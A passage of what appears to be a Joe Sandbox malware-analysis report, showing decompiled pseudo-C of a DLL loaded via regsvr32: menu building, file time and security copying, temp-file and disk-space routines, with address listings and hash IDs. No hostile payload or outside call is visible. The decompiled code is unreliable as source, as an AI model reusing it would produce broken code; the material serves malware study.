									_t190 = _t225 + _t212;
									r8d = 0;
									DeleteMenu(??, ??, ??);
									_t178 = _t178 + 1;
									__eflags = _t178 -  *(_t291 + 8);
								} while (_t178 <  *(_t291 + 8));
							}
							_t265 = _t296 + 0x70;
							_t183 = 0x104;
							_t117 = GetCurrentDirectoryW(??, ??);
							__eflags = _t117;
							if(_t117 != 0) {
								__eflags = _t117 - 0x104;
								if(_t117 < 0x104) {
									_t118 = lstrlenW();
									_t314 = _t118;
									 *((short*)(_t296 + 0x70 + _t118 * 2)) = 0x5c;
									r13d = r13d + 1;
									_t234 = r13d;
									 *((short*)(_t296 + 0x70 + r13d * 2)) = 0;
									E10029130(_t118);
									_t308 = _t212;
									_t212 = _t212 == 0;
									if(_t212 == 0) {
										E10009538(0x80004005, _t190, _t212, _t225, _t234, _t265, _t284, _t299, _t304, _t308);
										asm("int3");
									}
									_t213 =  *_t212;
									_t235 = _t308;
									_t120 =  *((intOrPtr*)(_t213 + 0x18))();
									_t214 = _t213 + 0x18;
									 *((long long*)(_t296 + 0x38)) = _t214;
									E10029130(_t120);
									_t309 = _t214;
									__eflags = _t214;
									_t183 = 0 | __eflags != 0x00000000;
									if(__eflags == 0) {
										_t183 = 0x80004005;
										E10009538(0x80004005, _t190, _t214, _t225, _t235, _t265, _t284, _t299, _t304, _t309);
										asm("int3");
									}
									_t215 =  *_t214;
									 *((intOrPtr*)(_t215 + 0x18))();
									_t56 = _t215 + 0x18; // 0x18
									_t226 = _t56;
									 *(_t296 + 0x30) = _t226;
									r12d = 0;
									_t58 = _t310 - 1; // -1
									r15d = _t58;
									__eflags =  *(_t291 + 8) - r12d;
									if( *(_t291 + 8) > r12d) {
										while(1) {
											_t218 =  *_t291;
											 *((intOrPtr*)(_t296 + 0x28)) = 1;
											 *(_t296 + 0x20) = r13d;
											_t305 = _t296 + 0x70;
											r8d = r12d;
											_t269 = _t296 + 0x38;
											_t130 =  *((intOrPtr*)(_t218 + 0x10))();
											__eflags = _t130;
											if(_t130 == 0) {
												goto L63;
											}
											_t285 =  *((intOrPtr*)(_t296 + 0x38));
											_t191 = _t218 + _t218;
											_t183 = 1 -  *((intOrPtr*)(_t226 - 8));
											__eflags =  *((intOrPtr*)(_t226 - 0xc)) - _t218 + _t218 | 0x00000001 -  *((intOrPtr*)(_t226 - 8));
											if(( *((intOrPtr*)(_t226 - 0xc)) - _t218 + _t218 | 0x00000001 -  *((intOrPtr*)(_t226 - 8))) < 0) {
												E10009920(_t191, _t296 + 0x30, _t285, _t299);
												_t226 =  *(_t296 + 0x30);
											}
											_t242 = _t226;
											_t135 =  *_t285 & 0x0000ffff;
											__eflags = _t135;
											while(_t135 != 0) {
												__eflags = _t135 - 0x26;
												if(_t135 == 0x26) {
													 *_t242 = _t135;
													_t242 = _t242 + 2;
													__eflags = _t242;
												}
												 *_t242 =  *_t285 & 0x0000ffff;
												_t242 = _t242 + 2;
												_t285 =  &(_t285[1]);
												_t135 =  *_t285;
												__eflags = _t135;
											}
											 *_t242 = 0;
											__eflags = _t226;
											if(_t226 != 0) {
												_t242 = _t226;
												_t136 = E10039820(_t135, _t226);
												__eflags = _t136;
												if(_t136 < 0) {
													goto L62;
												} else {
													goto L41;
												}
											} else {
												_t136 = 0;
												L41:
												__eflags = _t136 -  *((intOrPtr*)(_t226 - 0xc));
												if(_t136 >  *((intOrPtr*)(_t226 - 0xc))) {
													L62:
													_t183 = 0x80070057;
													E10009538(0x80070057, _t191, _t218, _t226, _t242, _t269, _t285, _t299, _t305, _t309);
													asm("int3");
												} else {
													 *(_t226 - 0x10) = _t136;
													 *((short*)(_t226 + _t218 * 2)) = 0;
													r9d = _t218 + _t310 + 1;
													r9d = r9d & 0x0000000f;
													__eflags = r9d - 0xa;
													if(r9d <= 0xa) {
														__eflags = r9d - 0xa;
														if(r9d != 0xa) {
															E1003AE90(L"&%d ", _t305);
															goto L52;
														} else {
															_t153 = E1003B730(_t218, _t226, _t296 + 0x58, _t218, _t285, _t287, _t291, L"1&0 ");
															__eflags = _t153;
															if(_t153 == 0) {
																goto L52;
															} else {
																__eflags = _t153 - 0xc;
																if(_t153 == 0xc) {
																	L60:
																	E100164FC();
																	asm("int3");
																	goto L61;
																} else {
																	__eflags = _t153 - 0x16;
																	if(_t153 == 0x16) {
																		L59:
																		E10016544();
																		asm("int3");
																		goto L60;
																	} else {
																		__eflags = _t153 - 0x22;
																		if(_t153 == 0x22) {
																			goto L59;
																		} else {
																			__eflags = _t153 - 0x50;
																			if(_t153 != 0x50) {
																				E10016544();
																				asm("int3");
																				goto L59;
																			} else {
																				goto L52;
																			}
																		}
																	}
																}
															}
														}
													} else {
														E1003AE90(L"%d ", _t305);
														L52:
														 *((intOrPtr*)(_t287 + 0xc)) = _t226 + 1;
														 *((intOrPtr*)(_t287 + 8)) =  &(_t285[0]);
														L10009D5C( *((intOrPtr*)(_t287 + 0xc)), _t218, _t296 + 0x40, _t296 + 0x58);
														E10032B80(_t191, _t296 + 0x48, _t218, _t296 + 0x30, _t305, _t310, _t314, _t315);
														_t299 =  *_t218;
														 *(_t296 + 0x20) =  *_t218;
														r8d = 0x400;
														InsertMenuW(??, ??, ??, ??, ??);
														_t274 =  *((intOrPtr*)(_t296 + 0x48)) + 0xffffffe8;
														asm("lock xadd [edx+0x10], eax");
														__eflags = r15d + r15d;
														if(r15d + r15d <= 0) {
															 *((intOrPtr*)( *((intOrPtr*)( *_t274)) + 8))();
														}
														_t276 =  *((intOrPtr*)(_t296 + 0x40)) + 0xffffffe8;
														asm("lock xadd [edx+0x10], eax");
														__eflags = r15d + r15d;
														if(r15d + r15d <= 0) {
															 *((intOrPtr*)( *((intOrPtr*)( *_t276)) + 8))();
														}
														r12d = r12d + 1;
														__eflags = r12d -  *(_t291 + 8);
														if(r12d >=  *(_t291 + 8)) {
															L61:
															_t226 =  *(_t296 + 0x30);
														} else {
															_t226 =  *(_t296 + 0x30);
															continue;
														}
													}
												}
											}
											goto L63;
										}
									}
									L63:
									 *((intOrPtr*)(_t287 + 0xc)) =  *((intOrPtr*)(_t287 + 0xc)) + 0xffffffff;
									 *((intOrPtr*)(_t287 + 0x30)) = GetMenuItemCount(??);
									 *((intOrPtr*)(_t287 + 0x28)) = 1;
									_t108 = _t226 - 0x18; // 0x0
									_t266 = _t108;
									asm("lock xadd [edx+0x10], eax");
									__eflags = r15d + r15d;
									if(r15d + r15d <= 0) {
										 *((intOrPtr*)( *((intOrPtr*)( *_t266)) + 8))();
									}
									_t268 =  *((intOrPtr*)(_t296 + 0x38)) + 0xffffffe8;
									asm("lock xadd [edx+0x10], eax");
									__eflags = r15d + r15d;
									if(r15d + r15d <= 0) {
										 *((intOrPtr*)( *((intOrPtr*)( *_t268)) + 8))();
									}
								}
							}
						}
					} else {
						_t279 =  *((intOrPtr*)(_t291 + 0x30));
						__eflags =  *(_t279 - 0x10);
						if( *(_t279 - 0x10) != 0) {
							 *((intOrPtr*)( *_t287 + 0x18))();
						}
						 *((intOrPtr*)( *_t287))();
					}
					__eflags =  *(_t296 + 0x280) ^ _t296;
					return E10038D20(_t183,  *(_t296 + 0x280) ^ _t296);
				} else {
					_t228 = __rdx;
					if(lstrlenW(??) >= 0x104) {
						goto L12;
					} else {
						_t257 = _t295 + 0x20;
						_t169 = E10030654(__ecx, _t295 + 0x20, __rdx, __r8);
						_t198 = _t169;
						if(_t169 == 0) {
							_t3 = _t208 - 1; // -1
							_t189 = _t3;
							_t4 = _t208 + 3; // 0x3
							_t182 = _t4;
							r8d = 0;
							E10031BE4(_t4, _t3, _t198, _t208, __rdx, _t257, __rdx, __rcx, _t286, __r8);
							asm("int3");
						}
						_t181 = 0;
						_t171 =  *((intOrPtr*)(_t284 + 8)) - 1;
						if( *((intOrPtr*)(_t284 + 8)) - 1 > 0) {
							while(E1002FB98(_t182, _t189,  *((intOrPtr*)(_t286 +  *((intOrPtr*)(_t284 + 0x10)))), _t295 + 0x20, _t299, _t304) == 0) {
								_t181 = _t181 + 1;
								_t286 = _t286 + 8;
								_t171 =  *((intOrPtr*)(_t284 + 8)) - 1;
								if(_t181 <  *((intOrPtr*)(_t284 + 8)) - 1) {
									continue;
								}
								break;
							}
							if(_t181 > 0) {
								_t10 = _t225 - 1; // -1
								_t289 = _t181 << 3;
								_t293 = _t10 << 3;
								do {
									_t171 = E1001A4B4(_t181, 0, _t289 +  *((intOrPtr*)(_t284 + 0x10)),  *((intOrPtr*)(_t284 + 0x10)) + _t293, _t299, _t310);
									_t181 = _t181 - 1;
									_t293 = _t293 - 8;
									_t289 = _t289 - 8;
								} while (_t181 > 0);
							}
						}
						r8d = E10039820(_t171, _t295 + 0x20);
						E10009CAC(_t181,  *((intOrPtr*)(_t284 + 0x10)), _t295 + 0x20, _t286, _t290, _t310);
						return E10038D20(_t182,  *(_t295 + 0x230) ^ _t295);
					}
				}
			}



























































                                                                              0x10032ff8
                                                                              0x10032ff8
                                                                              0x10032ff8
                                                                              0x10032ff8
                                                                              0x10032ff8
                                                                              0x10032ff8
                                                                              0x10032ff8
                                                                              0x10032ff8
                                                                              0x10032ff8
                                                                              0x10032ffd
                                                                              0x10033004
                                                                              0x1003300b
                                                                              0x1003300e
                                                                              0x10033019
                                                                              0x1003301c
                                                                              0x1003301f
                                                                              0x100330fd
                                                                              0x100330fd
                                                                              0x10033100
                                                                              0x10033100
                                                                              0x10033104
                                                                              0x10033104
                                                                              0x10033107
                                                                              0x1003310c
                                                                              0x1003310d
                                                                              0x1003310e
                                                                              0x1003310f
                                                                              0x10033110
                                                                              0x10033112
                                                                              0x10033113
                                                                              0x10033114
                                                                              0x10033115
                                                                              0x1003311b
                                                                              0x10033122
                                                                              0x1003312b
                                                                              0x10033135
                                                                              0x1003313d
                                                                              0x10033140
                                                                              0x1003314b
                                                                              0x1003314d
                                                                              0x1003314f
                                                                              0x10033154
                                                                              0x10033154
                                                                              0x10033155
                                                                              0x10033159
                                                                              0x1003315d
                                                                              0x10033161
                                                                              0x10033163
                                                                              0x10033166
                                                                              0x10033168
                                                                              0x10033168
                                                                              0x1003316b
                                                                              0x1003316f
                                                                              0x10033172
                                                                              0x10033172
                                                                              0x10033166
                                                                              0x10033177
                                                                              0x1003317b
                                                                              0x1003317e
                                                                              0x10033182
                                                                              0x100331a6
                                                                              0x100331ab
                                                                              0x100331b1
                                                                              0x100331b3
                                                                              0x100331b6
                                                                              0x100331b8
                                                                              0x100331bb
                                                                              0x100331c2
                                                                              0x100331c9
                                                                              0x100331cf
                                                                              0x100331d2
                                                                              0x100331d2
                                                                              0x100331b8
                                                                              0x100331d7
                                                                              0x100331e1
                                                                              0x100331e3
                                                                              0x100331e9
                                                                              0x100331eb
                                                                              0x100331f1
                                                                              0x100331f3
                                                                              0x100331fe
                                                                              0x10033204
                                                                              0x10033207
                                                                              0x1003320f
                                                                              0x10033213
                                                                              0x10033216
                                                                              0x1003321d
                                                                              0x10033222
                                                                              0x1003322d
                                                                              0x1003322f
                                                                              0x10033236
                                                                              0x1003323b
                                                                              0x1003323b
                                                                              0x1003323c
                                                                              0x1003323f
                                                                              0x10033242
                                                                              0x10033245
                                                                              0x10033249
                                                                              0x1003324e
                                                                              0x10033253
                                                                              0x10033258
                                                                              0x1003325b
                                                                              0x10033260
                                                                              0x10033262
                                                                              0x10033267
                                                                              0x1003326c
                                                                              0x1003326c
                                                                              0x1003326d
                                                                              0x10033273
                                                                              0x10033276
                                                                              0x10033276
                                                                              0x1003327a
                                                                              0x1003327f
                                                                              0x10033282
                                                                              0x10033282
                                                                              0x10033287
                                                                              0x1003328b
                                                                              0x10033291
                                                                              0x10033291
                                                                              0x10033295
                                                                              0x1003329d
                                                                              0x100332a2
                                                                              0x100332a7
                                                                              0x100332aa
                                                                              0x100332b2
                                                                              0x100332b5
                                                                              0x100332b7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100332bd
                                                                              0x100332c5
                                                                              0x100332cd
                                                                              0x100332d5
                                                                              0x100332d7
                                                                              0x100332de
                                                                              0x100332e3
                                                                              0x100332e3
                                                                              0x100332e8
                                                                              0x100332eb
                                                                              0x100332ee
                                                                              0x100332f1
                                                                              0x100332f3
                                                                              0x100332f7
                                                                              0x100332f9
                                                                              0x100332fc
                                                                              0x100332fc
                                                                              0x100332fc
                                                                              0x10033303
                                                                              0x10033306
                                                                              0x1003330a
                                                                              0x1003330e
                                                                              0x10033311
                                                                              0x10033311
                                                                              0x10033316
                                                                              0x1003331b
                                                                              0x1003331e
                                                                              0x10033324
                                                                              0x10033327
                                                                              0x1003332c
                                                                              0x1003332e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10033320
                                                                              0x10033320
                                                                              0x10033334
                                                                              0x10033334
                                                                              0x10033337
                                                                              0x10033490
                                                                              0x10033490
                                                                              0x10033495
                                                                              0x1003349a
                                                                              0x1003333d
                                                                              0x1003333d
                                                                              0x10033342
                                                                              0x1003334b
                                                                              0x10033350
                                                                              0x10033359
                                                                              0x1003335c
                                                                              0x10033374
                                                                              0x10033377
                                                                              0x100333c6
                                                                              0x00000000
                                                                              0x10033379
                                                                              0x10033388
                                                                              0x1003338d
                                                                              0x1003338f
                                                                              0x00000000
                                                                              0x10033391
                                                                              0x10033391
                                                                              0x10033394
                                                                              0x10033483
                                                                              0x10033483
                                                                              0x10033488
                                                                              0x00000000
                                                                              0x1003339a
                                                                              0x1003339a
                                                                              0x1003339d
                                                                              0x1003347d
                                                                              0x1003347d
                                                                              0x10033482
                                                                              0x00000000
                                                                              0x100333a3
                                                                              0x100333a3
                                                                              0x100333a6
                                                                              0x00000000
                                                                              0x100333ac
                                                                              0x100333ac
                                                                              0x100333af
                                                                              0x10033477
                                                                              0x1003347c
                                                                              0x00000000
                                                                              0x100333b5
                                                                              0x00000000
                                                                              0x100333b5
                                                                              0x100333af
                                                                              0x100333a6
                                                                              0x1003339d
                                                                              0x10033394
                                                                              0x1003338f
                                                                              0x1003335e
                                                                              0x1003336d
                                                                              0x100333cb
                                                                              0x100333d4
                                                                              0x100333da
                                                                              0x100333e7
                                                                              0x100333fa
                                                                              0x100333ff
                                                                              0x10033406
                                                                              0x1003340e
                                                                              0x1003341a
                                                                              0x10033425
                                                                              0x1003342c
                                                                              0x10033434
                                                                              0x10033436
                                                                              0x1003343e
                                                                              0x1003343e
                                                                              0x10033447
                                                                              0x1003344e
                                                                              0x10033456
                                                                              0x10033458
                                                                              0x10033460
                                                                              0x10033460
                                                                              0x10033463
                                                                              0x10033467
                                                                              0x1003346b
                                                                              0x10033489
                                                                              0x10033489
                                                                              0x1003346d
                                                                              0x1003346d
                                                                              0x00000000
                                                                              0x1003346d
                                                                              0x1003346b
                                                                              0x1003335c
                                                                              0x10033337
                                                                              0x00000000
                                                                              0x1003331e
                                                                              0x10033291
                                                                              0x1003349b
                                                                              0x1003349b
                                                                              0x100334ad
                                                                              0x100334b0
                                                                              0x100334b7
                                                                              0x100334b7
                                                                              0x100334be
                                                                              0x100334c6
                                                                              0x100334c8
                                                                              0x100334d0
                                                                              0x100334d0
                                                                              0x100334d9
                                                                              0x100334e0
                                                                              0x100334e8
                                                                              0x100334ea
                                                                              0x100334f2
                                                                              0x100334f2
                                                                              0x100334ea
                                                                              0x100331f3
                                                                              0x100331eb
                                                                              0x10033184
                                                                              0x10033184
                                                                              0x10033188
                                                                              0x1003318c
                                                                              0x10033194
                                                                              0x10033194
                                                                              0x1003319f
                                                                              0x1003319f
                                                                              0x100334fd
                                                                              0x10033516
                                                                              0x10033025
                                                                              0x10033025
                                                                              0x10033033
                                                                              0x00000000
                                                                              0x10033039
                                                                              0x10033039
                                                                              0x10033041
                                                                              0x10033046
                                                                              0x10033048
                                                                              0x1003304a
                                                                              0x1003304a
                                                                              0x1003304d
                                                                              0x1003304d
                                                                              0x10033050
                                                                              0x10033053
                                                                              0x10033058
                                                                              0x10033058
                                                                              0x1003305c
                                                                              0x1003305e
                                                                              0x10033063
                                                                              0x10033067
                                                                              0x10033080
                                                                              0x10033083
                                                                              0x10033087
                                                                              0x1003308c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003308c
                                                                              0x10033090
                                                                              0x10033092
                                                                              0x1003309b
                                                                              0x1003309f
                                                                              0x100330a3
                                                                              0x100330af
                                                                              0x100330b4
                                                                              0x100330b7
                                                                              0x100330bb
                                                                              0x100330bf
                                                                              0x100330a3
                                                                              0x10033090
                                                                              0x100330d9
                                                                              0x100330dc
                                                                              0x100330fc
                                                                              0x100330fc
                                                                              0x10033033

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$lstrlensprintf_s$CountCurrentDeleteDirectoryInsertItem
                                                                              • String ID: %d $&%d $1&0 $\
                                                                              • API String ID: 2651913498-2399880791
                                                                              • Opcode ID: 6423b69a79b3daf53ef24fd9608d27e5771d2fece104a4fa99e73612f8d8be46
                                                                              • Instruction ID: 130aa708e452667aaf5aa2f27966080f3893ca0032e9e587f41a87aea57f3ff9
                                                                              • Opcode Fuzzy Hash: 6423b69a79b3daf53ef24fd9608d27e5771d2fece104a4fa99e73612f8d8be46
                                                                              • Instruction Fuzzy Hash: 2DE1F276700A858BDB16CF25D88479E73A0FB84BD9F408626EF5A8BB54DF38D985C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10022ECC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 198timeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 46%
                                                                              			E10022ECC(void* __ebx, void* __edx, void* __esi, void* __rcx, void* __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* _t62;
				int _t65;
				int _t85;
				signed int _t86;
				void* _t90;
				void* _t99;
				signed int _t100;
				void* _t103;
				signed long long _t107;
				signed long long _t123;
				signed long long _t124;
				long long _t125;
				void* _t127;
				intOrPtr _t133;
				intOrPtr* _t135;
				void* _t146;
				intOrPtr _t164;
				intOrPtr* _t174;
				void* _t176;
				long long _t177;
				void* _t178;
				void* _t179;
				signed long long _t180;
				void* _t187;
				intOrPtr _t194;
				void* _t195;
				signed long long _t196;
				void* _t198;
				void* _t199;

				_t103 = __esi;
				_t94 = __edx;
				_t90 = __ebx;
				 *((long long*)(_t180 + 0x70)) = 0xfffffffe;
				_t123 =  *0x1006f4c8; // 0x6f13091946cb
				_t124 = _t123 ^ _t180;
				 *(_t180 + 0x4c0) = _t124;
				_t199 = __r9;
				r12d = r8d;
				_t178 = __rdx;
				_t179 = __rcx;
				_t135 = __rcx + 0x20;
				E100098B4(_t135);
				 *((long long*)(_t180 + 0x80)) = 0;
				 *((long long*)(_t180 + 0x88)) = 0;
				 *((long long*)(_t180 + 0x90)) = 0;
				asm("inc ecx");
				if(_t124 >= 0) {
					L17:
					_t164 =  *_t135;
					_t116 =  *((intOrPtr*)(_t164 - 0x10));
					if( *((intOrPtr*)(_t164 - 0x10)) == 0) {
						L29:
						E100098B4(_t135);
						r8d = r12d;
						E10030734(_t91, _t94, _t103, __eflags, _t179, _t178, _t199);
						L30:
						return E10038D20(_t91,  *(_t180 + 0x4c0) ^ _t180);
					}
					r8d = r12d;
					if(E10030734(_t91, _t94, _t103, _t116, _t179, _t164, _t199) == 0) {
						goto L29;
					}
					if(_t178 != 0) {
						_t62 = E10039820(_t61, _t178);
					} else {
						_t62 = 0;
					}
					r8d = _t62;
					E10009CAC(_t90, _t179 + 0x18, _t178, _t178, _t179, _t198);
					if(GetFileTime(??, ??, ??, ??) != 0) {
						E10031188(_t180 + 0x80, _t180 + 0x48);
						SetFileTime(??, ??, ??, ??);
					}
					 *(_t180 + 0x30) = 0;
					_t125 = _t180 + 0x30;
					 *((long long*)(_t180 + 0x20)) = _t125;
					r9d = 0;
					r8d = 0;
					_t146 = _t178;
					_t65 = GetFileSecurityW(??, ??, ??, ??, ??);
					_t120 = _t65;
					if(_t65 != 0) {
						_t91 =  *(_t180 + 0x30);
						E10009454(_t120, _t125, _t146);
						_t177 = _t125;
						_t126 = _t180 + 0x30;
						 *((long long*)(_t180 + 0x20)) = _t180 + 0x30;
						r9d =  *(_t180 + 0x30);
						if(GetFileSecurityW(??, ??, ??, ??, ??) != 0) {
							SetFileSecurityW();
						}
						L10009490(_t126, _t177);
					}
					goto L30;
				}
				_t170 = _t180 + 0x80;
				_t152 = _t178;
				if(E10030FE0(_t99, _t178, _t180 + 0x80, __r8, __r9, _t195) == 0) {
					goto L17;
				}
				E10029130(_t73);
				_t196 = _t124;
				_t107 = _t124;
				_t91 = 0 | _t107 == 0x00000000;
				if(_t107 == 0) {
					_t91 = 0x80004005;
					E10009538(0x80004005, __edx, _t124, _t135, _t152, _t170, _t176, __r8, __r9, _t196);
					asm("int3");
				}
				_t127 =  *_t124;
				 *((intOrPtr*)(_t127 + 0x18))();
				 *((long long*)(_t180 + 0x40)) = _t127 + 0x18;
				E1003004C(_t178, _t180 + 0x40, _t176, _t178, _t179);
				_t100 = 0;
				 *((long long*)(_t180 + 0x20)) = _t180 + 0x58;
				if(GetDiskFreeSpaceW(??, ??, ??, ??, ??) != 0) {
					_t100 =  *(_t180 + 0x3c) *  *(_t180 + 0x34) *  *(_t180 + 0x38);
				}
				if(_t100 <=  *((intOrPtr*)(_t180 + 0x98)) +  *((intOrPtr*)(_t180 + 0x98))) {
					L15:
					_t174 =  *((intOrPtr*)(_t180 + 0x40)) + 0xffffffe8;
					asm("lock xadd [edx+0x10], eax");
					if(0x1fffffffe <= 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t174)) + 8))();
					}
					goto L17;
				} else {
					_t187 = _t180 + 0x2b0;
					GetFullPathNameW(??, ??, ??, ??);
					_t197 =  *((intOrPtr*)(_t180 + 0x68));
					 *((short*)( *((intOrPtr*)(_t180 + 0x68)))) = 0;
					_t133 =  *_t135;
					_t91 = 1 -  *((intOrPtr*)(_t133 - 8));
					_t94 = 0x105;
					if(( *((intOrPtr*)(_t133 - 0xc)) - 0x00000105 | 0x00000001) < 0) {
						E10009920(0x105, _t135, _t176, _t187);
					}
					_t194 =  *_t135;
					r8d = 0;
					_t85 = GetTempFileNameW(??, ??, ??, ??);
					_t160 =  *_t135;
					if( *_t135 != 0) {
						_t86 = E10039820(_t85, _t160);
						__eflags = _t86;
						if(__eflags < 0) {
							goto L14;
						}
						goto L12;
					} else {
						_t86 = 0;
						L12:
						_t160 =  *_t135;
						if(_t86 >  *((intOrPtr*)(_t160 - 0xc))) {
							L14:
							_t91 = 0x80070057;
							E10009538(0x80070057, _t94, _t133, _t135, _t160, 0x1005a1e0, _t176, _t187, _t194, _t197);
							goto L15;
						}
						 *(_t160 - 0x10) = _t86;
						 *((short*)( *_t135 + _t86 * 2)) = 0;
						goto L15;
					}
				}
			}





































                                                                              0x10022ecc
                                                                              0x10022ecc
                                                                              0x10022ecc
                                                                              0x10022edc
                                                                              0x10022ee5
                                                                              0x10022eec
                                                                              0x10022eef
                                                                              0x10022ef7
                                                                              0x10022efa
                                                                              0x10022efd
                                                                              0x10022f00
                                                                              0x10022f03
                                                                              0x10022f0a
                                                                              0x10022f0f
                                                                              0x10022f1b
                                                                              0x10022f27
                                                                              0x10022f33
                                                                              0x10022f38
                                                                              0x100230a2
                                                                              0x100230a2
                                                                              0x100230a5
                                                                              0x100230a9
                                                                              0x100231a2
                                                                              0x100231a5
                                                                              0x100231ad
                                                                              0x100231b6
                                                                              0x100231bb
                                                                              0x100231da
                                                                              0x100231da
                                                                              0x100230b2
                                                                              0x100230bf
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100230c8
                                                                              0x100230d1
                                                                              0x100230ca
                                                                              0x100230ca
                                                                              0x100230ca
                                                                              0x100230d6
                                                                              0x100230e0
                                                                              0x10023100
                                                                              0x1002310f
                                                                              0x10023127
                                                                              0x10023127
                                                                              0x1002312d
                                                                              0x10023135
                                                                              0x1002313a
                                                                              0x1002313f
                                                                              0x10023142
                                                                              0x1002314b
                                                                              0x1002314e
                                                                              0x10023154
                                                                              0x10023156
                                                                              0x10023158
                                                                              0x1002315c
                                                                              0x10023161
                                                                              0x10023164
                                                                              0x10023169
                                                                              0x1002316e
                                                                              0x10023183
                                                                              0x1002318d
                                                                              0x1002318d
                                                                              0x10023196
                                                                              0x10023196
                                                                              0x00000000
                                                                              0x1002319b
                                                                              0x10022f3e
                                                                              0x10022f46
                                                                              0x10022f50
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10022f56
                                                                              0x10022f5b
                                                                              0x10022f60
                                                                              0x10022f63
                                                                              0x10022f68
                                                                              0x10022f6a
                                                                              0x10022f6f
                                                                              0x10022f74
                                                                              0x10022f74
                                                                              0x10022f75
                                                                              0x10022f7b
                                                                              0x10022f82
                                                                              0x10022f8f
                                                                              0x10022f94
                                                                              0x10022f9b
                                                                              0x10022fbc
                                                                              0x10022fc7
                                                                              0x10022fc7
                                                                              0x10022fde
                                                                              0x1002307f
                                                                              0x10023084
                                                                              0x1002308d
                                                                              0x10023097
                                                                              0x1002309f
                                                                              0x1002309f
                                                                              0x00000000
                                                                              0x10022fe4
                                                                              0x10022fe9
                                                                              0x10022ff9
                                                                              0x10022fff
                                                                              0x10023004
                                                                              0x1002300a
                                                                              0x10023012
                                                                              0x10023018
                                                                              0x10023021
                                                                              0x10023026
                                                                              0x10023026
                                                                              0x1002302b
                                                                              0x1002302e
                                                                              0x10023040
                                                                              0x10023046
                                                                              0x1002304c
                                                                              0x10023052
                                                                              0x10023057
                                                                              0x10023059
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002304e
                                                                              0x1002304e
                                                                              0x1002305b
                                                                              0x1002305b
                                                                              0x10023061
                                                                              0x10023074
                                                                              0x10023074
                                                                              0x10023079
                                                                              0x00000000
                                                                              0x10023079
                                                                              0x10023063
                                                                              0x1002306c
                                                                              0x00000000
                                                                              0x1002306c
                                                                              0x1002304c

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: File$Security$NameTime$DiskFreeFullPathSpaceTemp
                                                                              • String ID: MFC
                                                                              • API String ID: 2917024988-3472178984
                                                                              • Opcode ID: c48ca5ddcab6d1b749c5a0bda07dd872cbfe5c94c113f6b83e46070c386f551d
                                                                              • Instruction ID: 16a1dcdf5e9d30299e259c4cf1173f5685aa1153fd83834e6046d73f7411ff2e
                                                                              • Opcode Fuzzy Hash: c48ca5ddcab6d1b749c5a0bda07dd872cbfe5c94c113f6b83e46070c386f551d
                                                                              • Instruction Fuzzy Hash: BB71CF36314B8586EB10CF26F85079E73A0F785BD4F818126EE8A47BA8DF78D546CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001963C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 156COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 73%
                                                                              			E1001963C(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, long long __rax, intOrPtr* __rcx, void* __rdx, void* __r8, void* __r9, void* __r11, char _a24) {
				intOrPtr _v88;
				char _v136;
				signed int _t37;
				signed int _t40;
				int _t44;
				short _t47;
				short _t51;
				short _t53;
				void* _t56;
				void* _t57;
				void* _t61;
				intOrPtr _t66;
				void* _t67;
				long long _t70;
				signed int _t71;
				intOrPtr* _t72;
				void* _t93;
				void* _t99;
				intOrPtr* _t100;
				void* _t103;
				void* _t105;
				long long _t106;
				void* _t108;
				long long _t109;

				_t105 = __r11;
				_t103 = __r9;
				_t101 = __r8;
				_t91 = __rdx;
				_t70 = __rax;
				_t67 = __esi;
				_t61 = __edx;
				_t57 = __ecx;
				_t56 = __ebx;
				_t108 = __rdx;
				_t72 = __rcx;
				if(E1000EBE0(__rax, __rcx, __rdx, __r8) == 0) {
					_t74 =  *(_t72 + 0x70);
